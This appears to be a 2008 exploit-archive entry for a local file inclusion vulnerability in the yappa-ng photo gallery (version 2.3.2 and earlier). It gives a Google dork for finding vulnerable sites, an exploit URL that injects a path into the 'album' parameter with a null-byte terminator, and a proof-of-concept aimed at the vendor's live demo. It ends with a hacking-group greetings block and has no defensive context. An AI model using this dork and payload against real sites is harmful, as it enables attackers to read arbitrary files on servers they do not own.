[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : yappa-ng <= 2.3.3-beta0 (album) Local File Inclusion Vulnerability
# Published : 2008-10-19
# Author : Vrs-hCk
# Previous Title : Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability
# Next Title : Vivvo CMS <= 3.4 Multiple Vulnerabilities Destroyer Exploit


[o]------------------------------------------------------------------------------------[x]
 |  Local File Include Vulnerability                                                    |
[o]------------------------------------------------------------------------------------[o]
 |  Software : yappa-ng Version 2.3.2                                                   |
 |  Vendor   : http://www.zirkon.at/zirkon/scripts/yappa-ng/yappa-ng_main_eng.html      |
 |  Date     : 19 October 2008                                                          |
 |  Author   : Vrs-hCk                                                                  |
 |  Contact  : d00r[at]telkom[dot]net                                                   |
[o]------------------------------------------------------------------------------------[o]

[??] Google Dork

    "Powered by yappa-ng 2.3.2"

[??] Exploit

    http://[site]/[yappa-ng-path]/index.php?album=[LFI]%00

[??] Proof of Concept

    http://www.zirkon.at/yappa-ng_demo/index.php?album=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
 |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, NgL, ScanneD, }^-^{, eminem,             |
 |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, dkk ...                  |
 |  c0li.m0de.0n & BeHave oR BeGone !!!                                                 |
[o]------------------------------------------------------------------------------------[o]

# www.Syue.com [2008-10-19]